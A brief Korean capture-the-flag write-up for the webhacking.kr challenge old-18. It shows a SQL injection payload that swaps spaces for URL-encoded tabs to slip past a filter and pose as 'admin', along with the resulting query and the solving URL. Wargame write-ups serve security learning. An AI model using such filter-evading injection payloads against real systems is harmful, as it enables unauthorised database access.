[Webhacking.kr] old-18
Wargame/webhacking.kr
https://webhacking.kr/challenge/web-32/ 필터링을 피해서 no에 2%09or%09id='admin'을 넣으면 전체 쿼리는 아래와 같다. select id from chall18 where id='guest' and no=2\tor\tid='admin' https://webhacking.kr/challenge/web-32/index.php?no=2%09or%09id=%27admin%27로 접속하면 문제가 풀린다.